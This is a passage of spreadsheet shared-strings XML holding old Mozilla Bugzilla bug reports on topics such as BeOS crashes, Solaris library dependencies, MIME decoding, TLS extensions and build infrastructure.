Bug 525962 will have the query to build this off of and will file another bug for pagination.</t>
  </si>
  <si>
    <t>ryansnyder.me+bugs</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-277467</t>
  </si>
  <si>
    <t>memory leak in nsilookandfeel::getmetric (missing CFRelease call)</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-273027</t>
  </si>
  <si>
    <t>Add theme: Brauserix02</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 de-DE rv:1.7.5) Gecko/20041108 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 de-DE rv:1.7.5) Gecko/20041108 Firefox/1.0
The Theme is called Brauserix. It is a theme for the admirers of Asterix
Comics. It is the first Version. You can download the .jar file on
http://www.brauserix.de
My Email is: martini@brauserix.de
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>martini</t>
  </si>
  <si>
    <t>TOOLKIT-274281</t>
  </si>
  <si>
    <t>[BeOS] BeOS lets events stay in port through the 'restarts' in LaunchChild causing crashes on faulty events.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (BeOS U BeOS BePC en-US rv:1.7.5) Gecko/20041212 Firefox/1.0
Build Identifier: Mozilla/5.0 (BeOS U BeOS BePC en-US rv:1.7.5) Gecko/20041212 Firefox/1.0
In plevent.c as well as in nsAppShell BeOS always tries to reuse a port for
eventqueues if it's open. As the port survives the 'restarts' in LaunchChild it
may (and does) contain events with faulty pointers. This causes Firefox to crash
after profile creation.
Reproducible: Always
Steps to Reproduce:
1. Remove any current profile for Firefox
2. Launch Firefox and see it crash.
Actual Results:  
Firefox crashes after profile creation.
Expected Results:  
Firefox should have launched.
MethodInfo::Invoke(void):
Invoke__10MethodInfo:
+001e ef0cd19a: * 388b movl (%eax) %edi
firefox-bin:sc
frame retaddr
fcffbe5c ef0cbdd2 nsAppShell::Run(void) + 0000013e
fcffbecc ee6cf361 nsAppShellService::Run(void) + 00000051
fcffbf0c 80020822 xre_main(int char ** nsXREAppData const *) + 00001f32</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-194730</t>
  </si>
  <si>
    <t>freewebs.com - cannot upload files popup window does not appear</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.2.1) Gecko/20021130
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.2.1) Gecko/20021130
When attempting to upload files to a Freewebs free web space account the popup
window that is supposed to appear to allow you to type in or browse to the
filename of the file to upload does not appear when using Mozilla though it
works fine in Internet Explorer.
Reproducible: Always
Steps to Reproduce:
1.Create an account if you do not already have one.
2.Log into it.
3.Click on site manager on the panel on the left.
4.Click on either add a page add a folder upload a file or multiple
file uploader.
Actual Results:  
Nothing
Expected Results:  
A pop-up window should appear to enter the filename to upload or browse to it.</t>
  </si>
  <si>
    <t>tomcbugzilla</t>
  </si>
  <si>
    <t>CORE-379148</t>
  </si>
  <si>
    <t>sun java breaks url bar</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9a5pre) Gecko/20070428 Minefield/3.0a5pre
Build Identifier: Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9a5pre) Gecko/20070428 Minefield/3.0a5pre
when viewing sites that have java on them sometimes Firefox url bar is not selectable happens 99 percent of the time 
might be related to fact that im using vista
Reproducible: Sometimes
Steps to Reproduce:
1.visit any site with java enabled
2.click url bar unable to click it
3.
Actual Results:  
firefox wont let you select urlbar
Expected Results:  
should be able to select text in urlbar and change it</t>
  </si>
  <si>
    <t>THUNDERBIRD-455127</t>
  </si>
  <si>
    <t>Thunderbird development instructions are wrong</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 de rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1
Build Identifier: 
If you follow the instructions on how to build thunderbird on www.mozilla.org/projects/thunderbird/ you end up downloading hundreds of megabytes of stuff that does not contain any thunderbird source.
And since the repositories on hg.mozilla.org aren't even related you cannot change to the correct branch without redownloading the shared stuff.
Reproducible: Always
Steps to Reproduce:
1. Go to http://www.mozilla.org/projects/thunderbird/
2. Click on Downloading Thunderbird Source Code
3. Follow the instructions
Actual Results:  
You get a clone of http://hg.mozilla.org/mozilla-central/
Expected Results:  
You get a clone of http://hg.mozilla.org/comm-central/
In addidtion there is no component (at least that I can find) to report errors in the website.
In addition I found it almost impossible to search for already reported bugs since the search function on the submit page seems to serch for bugs that contain any of the search keywords for any of the components.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-335076</t>
  </si>
  <si>
    <t>[BeOS] Wrong rendering of point-sized font tags</t>
  </si>
  <si>
    <t>This problem started to be visible after 
https://bugzilla.mozilla.org/show_bug.cgi?id=327406
checkin.
Two users noticed it with dualhead setup so virtual screen size was 2560 * 1024.
http://beos.spb.ru/mozilla/MozillaFontPointSizeBug2.png - look at counter at
bottom.
But it should be noticeable with single moder big monitors too so i'm wondering if someone has 1960*1200 or such monitor here.
Problem is lack of DPI API (and DPI-awarness at all) in BeOS so we use some tricks here
http://lxr.mozilla.org/seamonkey/source/gfx/src/beos/nsDeviceContextBeOS.cpp#136
but it seems that following code is also not so perfect.
As possible fixes and workarounds i propose
1)add layout.css.dpi also to BeOS section of all.js
2)restrict max resolution unconditionally to some valuse in nsDeviceContext - but what that value should be?
72 (this is DPI with which BeOS was designed in mind) produces too small fonts) ?
96?
Looks like it needs testing
3)that hack in source code before - I propose int(mHeightFloat*72./600.)
instead. As hardly someone will set dualhead to increase vertical resolution - it is hard to imagine monitors on top of eachother. Even Bill Gates don't do it with his 3 monitors!
4)Currently we always report single monitor in ScreenManager:
NS_IMETHODIMP
nsScreenManagerBeOS :: GetNumberOfScreens(PRUint32 *aNumberOfScreens)
{
  *aNumberOfScreens = 1
  return NS_OK
}
Looks like times are changing but I'm doubt that there is good piblic BeOS API to handle this poblem</t>
  </si>
  <si>
    <t>SEAMONKEY-110555</t>
  </si>
  <si>
    <t>Wipe out the default userChrome.css and userContent.css</t>
  </si>
  <si>
    <t>These two files seem to contain nothing. They get installed into the default
profile and get copied around into every profile. And we read these files on
startup.
chetu&gt; pwd
/cygdrive/e/dp/opt.trunk/mozilla/profile/defaults/chrome
chetu&gt; ls -l user*
-rw-r--r--    1 dp       None         1032 Sep 10 18:01 userChrome.css
-rw-r--r--    1 dp       None          503 Apr  4  2001 userContent.css
I am thinking of wiping them out and save two file reads on startup. Any harm ?
I can do it two ways:
- delete it from the defaults directory (my preference)
- delete code that copies it over to every profile when chrome/ directory is
created in nsChromeRegistry.cpp</t>
  </si>
  <si>
    <t>CORE-482148</t>
  </si>
  <si>
    <t>crash when serializing font-family descriptor for @font-face that doesn't have one</t>
  </si>
  <si>
    <t>Created attachment 366213
patch
Right now if we ask for fontFaceRule.style.fontFamily on an @font-face rule that doesn't have a font-family descriptor we crash rather than returning the empty string.
This fixes it by checking earlier for descriptors that aren't present so that we also don't have to check explicitly for the descriptor not being present in SerializeFontSrc.
I noticed this while writing some tests for descriptor storage and serialization (currently in test-descriptors in my patch queue at http://hg.mozilla.org/users/dbaron_mozilla.com/patches/ ) because of lack of code coverage in the output at http://people.mozilla.org/~mnandigama/codecoverage/src/layout/style/nsCSSDeclaration.cpp.gcov.html</t>
  </si>
  <si>
    <t>CORE-512407</t>
  </si>
  <si>
    <t>GeoLocation support for Windows 7 using Location API</t>
  </si>
  <si>
    <t>Windows 7 provides Location API.  Mozilla should support it for GeoLocation support for Windows 7.
How to use this API see the following documents.
http://msdn.microsoft.com/en-us/library/dd464636%28VS.85%29.aspx</t>
  </si>
  <si>
    <t>WEBTOOLS-913569</t>
  </si>
  <si>
    <t>kanbanzilla</t>
  </si>
  <si>
    <t>if login fails no error message is displayed</t>
  </si>
  <si>
    <t>When you click Login and enter bad credentials (for example) there's no UI feedback indicating a failure. If you have the web console open you can spot a 401 and you might also notice that the Login button doesn't change to Logout (and that your username doesn't appear in the title bar) but a new user won't necessarily know that these elements change when logged in.</t>
  </si>
  <si>
    <t>nmaul</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-275507</t>
  </si>
  <si>
    <t>Verkeerde vertaling bij nieuwe mail</t>
  </si>
  <si>
    <t>Onder Windows is er een indicatie van nieuwe mail in de icon tray in de taakbalk.
Er verschijnt dan een langzaam omhoogschuivend vlakje met de tekst:
(mailadres) 1 heeft een nieuw bericht.
De 1 is het aantal nieuwe berichten kan ook meer zijn.
De vertaling heeft een nieuw bericht is in deze context niet goed zou moeten
zijn nieuw(e) bericht(en) of het getal zou na het woord heeft moeten staan.</t>
  </si>
  <si>
    <t>pe1chl</t>
  </si>
  <si>
    <t>BUGZILLA-351486</t>
  </si>
  <si>
    <t>Documentation for the new skins feature</t>
  </si>
  <si>
    <t>The new skins feature needs docs. Here's a text description of it and how it works:
Bugzilla allows you to have multiple skins. These are custom CSS and possibly also custom images for Bugzilla. To create a new custom skin you have two choices:
* Make a single CSS file and put it in the skins/contrib directory.
* Make a directory that contains all the same CSS file names as skins/standard/
  and put your directory in skins/contrib/.
After you put the file or the directory there make sure to run checksetup.pl so that it can reset the file permissions correctly.
After you have installed the new skin it will show up as an option in the user's General Preferences. If you would like to force a particular skin on all users just select it in the Default Preferences and then uncheck Enabled on the preference.</t>
  </si>
  <si>
    <t>CORE-310875</t>
  </si>
  <si>
    <t>regression: context menu are reopened when hovering their target while a modal dialog is open</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8b5) Gecko/20051001
Firefox/1.4.1
This is a bit hard to explain...
Using recent mac branch builds context menus are reopened when hovering their
target while a modal dialog is open.
STR:
1. open two tabs
2. right click one of them
3. choose Close Other Tabs
4. when the warning is open hover the tab on which you right clicked.
-&gt; the context menu is reopened.</t>
  </si>
  <si>
    <t>CORE-205360</t>
  </si>
  <si>
    <t>libxpcom.so depends on non-existent libiconv.so</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U SunOS sun4u en-US rv:1.4a) Gecko/20030404
Build Identifier: http://ftp.mozilla.org/pub/mozilla/releases/mozilla1.4b/mozilla-sparc-sun-solaris2.8_1.4b.tar.gz
The Solaris 8 build of 1.4b depends on libiconv.so which does not (normally)
exist on Solaris.  Only the Gtk+ libraries are mentioned in the README and 1.4a
does not have this dependency.
1.4a:
[/local]0$ LD_LIBRARY_PATH=mozilla-1.4a:/local/netscape-7.0/dist/lib ldd
mozilla-1.4a/libxpcom.so
        libplds4.so =&gt;   mozilla-1.4a/libplds4.so
        libplc4.so =&gt;    mozilla-1.4a/libplc4.so
        libnspr4.so =&gt;   mozilla-1.4a/libnspr4.so
        libpthread.so.1 =&gt;       /usr/lib/libpthread.so.1
        libdl.so.1 =&gt;    /usr/lib/libdl.so.1
        librt.so.1 =&gt;    /usr/lib/librt.so.1
        libsocket.so.1 =&gt;        /usr/lib/libsocket.so.1
        libm.so.1 =&gt;     /usr/lib/libm.so.1
        libc.so.1 =&gt;     /usr/lib/libc.so.1
        libthread.so.1 =&gt;        /usr/lib/libthread.so.1
        libnsl.so.1 =&gt;   /usr/lib/libnsl.so.1
        libaio.so.1 =&gt;   /usr/lib/libaio.so.1
        libmp.so.2 =&gt;    /usr/lib/libmp.so.2
        /raid1/local/mozilla-1.4a/cpu/sparcv8plus/libnspr_flt4.so
        /usr/platform/SUNWSun-Blade-1000/lib/libc_psr.so.1
1.4b:
[/local]0$ LD_LIBRARY_PATH=mozilla-1.4b:/local/netscape-7.0/dist/lib ldd
mozilla-1.4b/libxpcom.so
        libplds4.so =&gt;   mozilla-1.4b/libplds4.so
        libplc4.so =&gt;    mozilla-1.4b/libplc4.so
        libnspr4.so =&gt;   mozilla-1.4b/libnspr4.so
        libpthread.so.1 =&gt;       /usr/lib/libpthread.so.1
        libdl.so.1 =&gt;    /usr/lib/libdl.so.1
        librt.so.1 =&gt;    /usr/lib/librt.so.1
        libsocket.so.1 =&gt;        /usr/lib/libsocket.so.1
        libm.so.1 =&gt;     /usr/lib/libm.so.1
***     libiconv.so =&gt;   (file not found)
        libc.so.1 =&gt;     /usr/lib/libc.so.1
        libthread.so.1 =&gt;        /usr/lib/libthread.so.1
        libnsl.so.1 =&gt;   /usr/lib/libnsl.so.1
        libaio.so.1 =&gt;   /usr/lib/libaio.so.1
        libmp.so.2 =&gt;    /usr/lib/libmp.so.2
        /raid1/local/mozilla-1.4b/cpu/sparcv8plus/libnspr_flt4.so
        /usr/platform/SUNWSun-Blade-1000/lib/libc_psr.so.1
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-458093</t>
  </si>
  <si>
    <t>Update Talos to send graph server new test information</t>
  </si>
  <si>
    <t>Since we're storing new data for 1.0 we need to make sure Talos sends everything the graph server needs to store the test results. We'll have to write up some basic info on the api.</t>
  </si>
  <si>
    <t>CORE-144376</t>
  </si>
  <si>
    <t>[ps] inaccurate postion when printing with Bold or Italic</t>
  </si>
  <si>
    <t>If part of one line is using Bold or Itatic the postion of succeeding charaters
is not inaccurate when printing. Charaters after Bold are to the left of
proper positionCharaters afer Itatic are to the right of proper position.</t>
  </si>
  <si>
    <t>NSS-226271</t>
  </si>
  <si>
    <t>implement RFC 3546 (TLS v1.0 extensions)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U WinNT4.0 en-US rv:1.6a) Gecko/20031025
Build Identifier: 
RFC 3546 (from June 2003) describes extensions to TLS v1.0 that are very usable
of which the most important seems to be:
-  Allow TLS clients to provide to the TLS server the name of the
   server they are contacting.  This functionality is desirable to
   facilitate secure connections to servers that host multiple
   'virtual' servers at a single underlying network address.
it is now difficult/impossible to host multiple hosts on the same IP if you want
to use SSL. this extension makes that possible.
i'm not sure whether someone has already implemented this server-side to test it on.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>CORE-357169</t>
  </si>
  <si>
    <t>GC temp roots cleanup</t>
  </si>
  <si>
    <t>Currently JS_PUSH_SINGLE_TEMP_ROOT macro casts its argument to jsval to allow to root arbitrary GC thing. But this may hide a bugs when improper value is passed to the macro. Thus the idea is to add JS_PUSH_TEMP_ROOT_STRING and JS_PUSH_TEMP_ROOT_GCTHING and remove the cast from JS_PUSH_SINGLE_TEMP_ROOT.</t>
  </si>
  <si>
    <t>THUNDERBIRD-300688</t>
  </si>
  <si>
    <t>get rid of the brand entity: brandRealShortName</t>
  </si>
  <si>
    <t>from brand.properties
I had to add this to work around some shared code betweek mozilla mail and
thunderbird in the mapi module.
However the recent re-branding effort for seamonkey where for them
brandShortName == brandFullName
means that I can get rid of my thunderbird hack of using a brandRealShortName
and just use brandShortName instead without breaking any of the mapi registry
key names for seamonkey or thunderbird.</t>
  </si>
  <si>
    <t>THUNDERBIRD-313341</t>
  </si>
  <si>
    <t>Allow Software Update to Set and Access Cookies in Thunderbird</t>
  </si>
  <si>
    <t>This is needed by software update. 
Thunderbird 1.5 clients need to be able to handle being sent cookies while
checking for a software update and can then send those cookies back to the
server for logging.
Currently Thunderbirds content policy manager steps in and blocks all attempts
to access cookies.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-16439</t>
  </si>
  <si>
    <t>despot/genstats using MySQL reserved when as colname</t>
  </si>
  <si>
    <t>In newer versions of MySQL the when is considered to be a reserved word.
Before Despot moves to a newer version of MySQL I need to tweak it and upgrade
the table to use a different name.  After doing this I also need to tweak
webtools/miscstats/genstats.cgi to deal with the change.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS-379209</t>
  </si>
  <si>
    <t>WINNT 5.0 patrocles Dep Tb-Nightly is hung</t>
  </si>
  <si>
    <t>The 1.8 branch Windows Thunderbird build which started at 19:30:00 on 2007-04-27 still hasn't finished - I think it's safe to say it's going to need some help.
See the severity discussion in bug 379207 - some guidance about how to translate from tier 2 to bug severity would be quite welcome.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-331452</t>
  </si>
  <si>
    <t>Optimize repeat refreshing</t>
  </si>
  <si>
    <t>Repeat is slow slow slow right now. One obvious thing that we can optimize is the refreshing part we do re-recreate the content on each refresh that is unnecessary. We just need to adjust the number of children to the size of the nodeset and then update the context nodes for each child.
Let's XBLize repeat first though (bug 306247).</t>
  </si>
  <si>
    <t>NSS-127365</t>
  </si>
  <si>
    <t>Crash in NSS when sending an encrypted message</t>
  </si>
  <si>
    <t>Using Build ID: 2002022203.
I went to send an encrypted message to someone I didn't have a certificate for.
I looked the person up in phonebook and clicked on Import Certificate. I then
went back to the compose window and hit send. That caused me to crash in NSS code.
Stack trace in talkback is not very helpful. ID: 3257756
nss3.dll + 0x229ab (0x01c629ab) 
After restarting I was able to send the encrypted message.</t>
  </si>
  <si>
    <t>DATA_&amp;_BI_SERVICES_TEAM-801422</t>
  </si>
  <si>
    <t>backup1.db.phx1.mozilla.com alerting on disk</t>
  </si>
  <si>
    <t>backup1.db.phx1.mozilla.com has been flapping with disk space warnings since yesterday at least.
[09:21]  | Sat 09:21:49 PDT [135] backup1.db.phx1.mozilla.com:DB Disk - All is OK: DISK OK (http://m.allizom.org/DB+Disk+-+All)
[06:50]  | Sun 06:50:58 PDT [103] backup1.db.phx1.mozilla.com:DB Disk - All is WARNING: DISK WARNING - free space: /data 71581 MB (10% inode=99%): (http://m.allizom.org DB+Disk+-+All)
[07:15]  | Sun 07:15:59 PDT [108] backup1.db.phx1.mozilla.com:DB Disk - All is OK: DISK OK (http://m.allizom.org/DB+Disk+-+All)
[07:54]  | Sun 07:54:59 PDT [112] backup1.db.phx1.mozilla.com:DB Disk - All is WARNING: DISK WARNING - free space: /data 69973 MB (10% inode=99%):
 (http://m.allizom.org/DB+Disk+-+All)
[08:04]  | Sun 08:04:58 PDT [113] backup1.db.phx1.mozilla.com:DB Disk - All is OK: DISK OK (http://m.allizom.org/DB+Disk+-+All)
[09:13]  | Sun 09:13:55 PDT [126] backup1.db.phx1.mozilla.com:DB Disk - All is WARNING: DISK WARNING - free space: /data 66369 MB (10% inode=99%): (http://m.allizom.org/DB+Disk+-+All)</t>
  </si>
  <si>
    <t>rwatson</t>
  </si>
  <si>
    <t>eziegenhorn</t>
  </si>
  <si>
    <t>BUGZILLA-382330</t>
  </si>
  <si>
    <t>Dependency trees broken when resolved bugs are hidden</t>
  </si>
  <si>
    <t>Created attachment 266476
patch v1
I regressed this in bug 344965: $bug-&gt;isopened is now a method and $bug-&gt;{'isopened'} no longer exists. That's the single script being affected by this change.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-237187</t>
  </si>
  <si>
    <t>clicking on any download link should load the product's best here's what you're about to get document</t>
  </si>
  <si>
    <t>When I click a link to download firefox (say from the front page of mozilla.org)
it should load a page at the same time as popping up the download window. That
page should be somthing like here's all the cool stuff you're about to
experience when the download finishes giving a sort of preview or enticement
while he waits on the download to complete. This would help us to hold onto his
eyeballs while the download happens and probably help ensure that he installs it
the second it's downloaded. 
If you don't have a page like this then he goes off to read slashdot or
something while the download happens. If he was only casually interested he
might even lose interest and never install firebird. 
Go download Quicktime from Apple to see how they approach this.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-75651</t>
  </si>
  <si>
    <t>Java installer needs to detect plugin install directory</t>
  </si>
  <si>
    <t>We're providing a new way for plugins to detect embedded installations of Gecko
and the Java plugin installer needs to use this new mechanism. peterlubczynski
worked on a preliminary version of this but we're cooking up a variation on it
for the summer releases. cc'ing Peter for a link to the technical details.
Since this installer issue blocks embedded Gecko from running Java at all
(unless you copy the files around by hand) I'm marking severity blocker.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-181123</t>
  </si>
  <si>
    <t>mime text encoded with base64 not decoded</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.1) Gecko/20020826
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.1) Gecko/20020826
The mozilla client will never understand such a mime encoded mail. It doesn't
display it
--mmsc-mgw-unique-boundary-1
Content-Type: text/plaincharset=utf-8
Content-Location: J4_jmjm_uwtw_pgpg.txt
Content-Transfer-Encoding: base64
SjQgam1qbSB1d3R3IHBncGc=
Reproducible: Always
Steps to Reproduce:
1.Send an email to your email account with such mime encoding
2.
3.
Expected Results:  
Mozilla should have decoded the content and display it as text. I know this the
worst thing to do to encode text with base64 but it's the way the nokia mmcs
works and it's underanted by most mail client</t>
  </si>
  <si>
    <t>arnaud2</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-439673</t>
  </si>
  <si>
    <t>restablish production tagging cron job on mozilla europe</t>
  </si>
  <si>
    <t>As part of the preparatory work for Firefox 3 I had asked our cron job to svn up our pages to be temporarily removed (see https://bugzilla.mozilla.org/show_bug.cgi?id=436807).  Please put it back thanks</t>
  </si>
  <si>
    <t>BUGZILLA-120236</t>
  </si>
  <si>
    <t>Discussion Bug - Bug Triaging</t>
  </si>
  <si>
    <t>Currently I do the triaging.  I periodically look at the untargetted list and
resolve them move them to a milestone or move them to Future.  I do it because
no one else volunteered.
Now I suppose I would be content to continue doing the work.  It's useful and I
feel it has been useful.  But for one simple fact - I suck at it - I can't
balance across milestones to save my life.
Currently there are (I think) around 400 bugs targetted at 2.18 a figure which
from past experience seems impossible to achieve.
So what can be done to make the milestones more realistic so we don't keep
bumping them up each release?  I'm primarily not really just looking for an
I'll do it as there's no evidence you'd be any better.  There are just too
many things that need doing NOW.
Is there any benefit in transferring this task over to the component owners? 
Would they bother?
This is a brainstorming bug no idea is too ridiculous - it could lead onto a
useful idea.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-241093</t>
  </si>
  <si>
    <t>Icon in preferences dialog for current category should appear selected.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8a) Gecko/20040416 Camino/0.7+
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8a) Gecko/20040416 Camino/0.7+
The icon for the current category in the preferences dialog's icon bar should
have a selected appearance (on Panther).
See the preferences dialogs of iTunes Safari or Mozilla where the background
behind the icon of the current category is darker gray.
Reproducible: Always
Steps to Reproduce:
1. Open the preferences dialog
2. Wonder which is the selected category
Actual Results:  
The icon bar does not indicate the selected category.
Expected Results:  
The icon bar should indicate the selected category by drawing the background
behind the icon of the selected category in darker gray.</t>
  </si>
  <si>
    <t>jpellico</t>
  </si>
  <si>
    <t>CORE-161452</t>
  </si>
  <si>
    <t>Twisty icon remains after deleting all its children</t>
  </si>
  <si>
    <t>Steps:
1. open manage bookmars
2. create a folder named a
3. create a folder named b under a
4. remove b
actual result: a still has a twisty icon.
expected result: twisty icon should disappear.
same problem in addressbook.</t>
  </si>
  <si>
    <t>CORE-390483</t>
  </si>
  <si>
    <t>Enumeration over ComputedCSSStyleDeclaration object doesn't show new SVG properties</t>
  </si>
  <si>
    <t>If I have a ComputedCSSStyleDeclaration (from getComputdStyle) and do a for..in on it I get most CSS properties but not the new SVG properties like stroke-width.  But if I ask for .length and every .item() I do get the new properties.  I'm guessing this inconsistency is a bug.</t>
  </si>
  <si>
    <t>FIREFOX-310921</t>
  </si>
  <si>
    <t>AccessibleObjectFromPoint gives wrong object in some cases when text object is incorrectly not exposed</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8b5) Gecko/20050928 Firefox/1.4
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8b5) Gecko/20050928 Firefox/1.4
AccessibleObjectFromPoint impl via IAccessible::accHitTest
Reproducible: Always
Steps to Reproduce:
Load this html into the latest FF 1.5 nightly and use your tester to get the
accessible object and rectangle as you move your mouse over each part of the
text and you'll see for the right half of the 2nd line it gives the rectangle
for the previou bold part..until you move to the next line of the non-bold part
where it finally figures out the right accessible/rectangle.
This part works fine right here and this part works
fine in bold but keep going  to the right where this bold ends and 
GetAccessibleFromPoint here gives wrong node for previous bold part. but here
after the line wraps it gets the correct accessible node and rect.</t>
  </si>
  <si>
    <t>tim.mchyde</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS_GRAVEYARD-139883</t>
  </si>
  <si>
    <t>ErrorHookProc can be tricked into thinking it never finished running</t>
  </si>
  <si>
    <t>If an error occurs while jsds_ErrorHookProc is installed but the errorHook
attribute of the debugger service has a null value jsds_ErrorHook will return
without clearing the |running| static.  Once this happens jsds_ErrorHook will
always think it is running the debugger service client will stop receiveing
error notifications.
This patch also fixes the max args allowed in a pretty printed function in
CreatePPLineMap.  The |argnames| array contains 12 dummy names but we enforced
a max of 8 in the if clause.  It also uses |nsnull| in place of 0 in a few places.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-363654</t>
  </si>
  <si>
    <t>.url files opened via File:Open don't open/don't open properly on the 1.8.0 branch</t>
  </si>
  <si>
    <t>For some reason 1.0.x won't properly open .url files from File: Open (drag-drop works fine) some don't open and some try to load only the path part.  Works fine on 18branch and trunk.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-496144</t>
  </si>
  <si>
    <t xml:space="preserve">l10n SVN account request: or - Manoj Kumar Giri </t>
  </si>
  <si>
    <t>Manoj has been translating Firefox (Oriya) and needs access to the SVN repository to submit translations for his web sites.</t>
  </si>
  <si>
    <t>CORE-325543</t>
  </si>
  <si>
    <t>Reframing sibling of node with pseudo parent does the wrong thing</t>
  </si>
  <si>
    <t>The problem is that ContentInserted gets the right parent frame based on siblings.  This is wrong when pseudo-frames are involved.</t>
  </si>
  <si>
    <t>NSPR-8018</t>
  </si>
  <si>
    <t>Cannot determine if a given event queue is on the current thread</t>
  </si>
  <si>
    <t>I need the ablity to determine if an event Q is on the current thread.  I am
data marshalling parameters and method infomation so that I can call a xpcom
object from any thread to any other thread.  If the dest event Q is on the same
thread I can simply bypass this event passing and call the method directly.  I
have emailed you (larry) about this and here is the agreed upon diff (note the
function name change):
Index: lib/ds/plevent.c
===================================================================
RCS file: /cvsroot/mozilla/nsprpub/lib/ds/plevent.cv
retrieving revision 3.18
diff -r3.18 plevent.c
798a799807
&gt; PR_IMPLEMENT(PRBool)
&gt; PL_IsQueueOnCurrentThread( PLEventQueue *queue )
&gt; {
&gt;     PRThread *me = PR_GetCurrentThread()
&gt;     if ( me == queue-&gt;handlerThread )
&gt;         return PR_TRUE
&gt;     else
&gt;         return PR_FALSE
&gt; } /* end PL_IsQueueOnCurrentThread() */
Index: lib/ds/plevent.h
===================================================================
RCS file: /cvsroot/mozilla/nsprpub/lib/ds/plevent.hv
retrieving revision 3.7
diff -r3.7 plevent.h
386a387397
&gt;
&gt; /*
&gt; **  This routine will allow you to check to see if the given eventQueue in
&gt; **  on the current thread.  It will return PR_TRUE if so else it will return
&gt; **  PR_FALSE
&gt; */
&gt;
&gt; PR_EXTERN(PRBool)
&gt; PL_IsQueueOnCurrentThread( PLEventQueue *queue )
Please let me know as soon as possible if and when this fuction will be added
since I am currently blocked.</t>
  </si>
  <si>
    <t>DEVELOPER_DOCUMENTATION-242510</t>
  </si>
  <si>
    <t>Open Publication License link gives a 403 error.</t>
  </si>
  <si>
    <t>At the bottom of the page where it discusses the discussion on a copyright
policy one of the suggested licenses that is under discussion is the Open
Publication License.  The link to it reports a 403 Forbidden error.
(This is an off-site link - perhaps this exists at another location now?)</t>
  </si>
  <si>
    <t>CORE-980630</t>
  </si>
  <si>
    <t>Remove type nuking</t>
  </si>
  <si>
    <t>Created attachment 8387201
patch
When an OOM occurs during inference we nuke all type information in the zone and disable inference.  This behavior is incompatible with bug 972817 and it isn't really necessary anymore: it was originally in place because with a web of interdependent constraints we are left in an inconsistent state if an OOM occurs in the middle of solving those constraints but now constraints are not interdependent and can only trigger recompilation of particular scripts or invalidation of new script information.
The attached patch removes type nuking and instead relies on other mechanisms such as marking type sets as unknown when OOM occurs.  Inference APIs are generally left alone and still generally infallible.  There are a few places where OOM can leave us in a place that isn't easy to recover from such as when copying data during GC sweeping or when adding scripts to the pending recompilation list.  In these places we just MOZ_CRASH it doesn't seem worth it to add a new mechanism to recover here when crashes here aren't easy to trigger and the rest of the browser just crashes on OOM anyways.</t>
  </si>
  <si>
    <t>CORE-417404</t>
  </si>
  <si>
    <t>nsCOMPtr version of NS_ProxyRelease() is broken</t>
  </si>
  <si>
    <t>Created attachment 303200
fix
uses 'doomed' after swapping it out with 'raw'.</t>
  </si>
  <si>
    <t>SEAMONKEY-80067</t>
  </si>
  <si>
    <t>assignment vs. equality typos</t>
  </si>
  <si>
    <t>I noticed a few probable assignment (=) vs. equality (==) typos in the code:
content/base/src/nsGenericElement.cpp:
  if (rv = NS_CONTENT_ATTR_NOT_THERE) {
content/events/src/nsDOMEvent.cpp:
  if (mEvent-&gt;eventStructType = NS_MOUSE_EVENT) {
  if (mEvent-&gt;eventStructType = NS_KEY_EVENT) {
extensions/xmlterm/base/mozXMLTermSession.cpp:
  if ((styleChanges = 1) &amp;&amp;
xpcom/base/nsDebugHelpWin32.cpp:
  if(gHooks = this)
xpcom/reflect/xptcall/src/md/os2/xptcinvoke_icc.cpp:
  if( cpcount = 0 ) {
  } else if( cpcount = 1 )
I'm mostly positive that the ones in content and xpcom/reflect are typos and
not entirely sure about the ones in extensions/xmlterm and xpcom/base.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-169202</t>
  </si>
  <si>
    <t>arkia.co.il - Arkia (Israeli airline) - site not usable with Gecko</t>
  </si>
  <si>
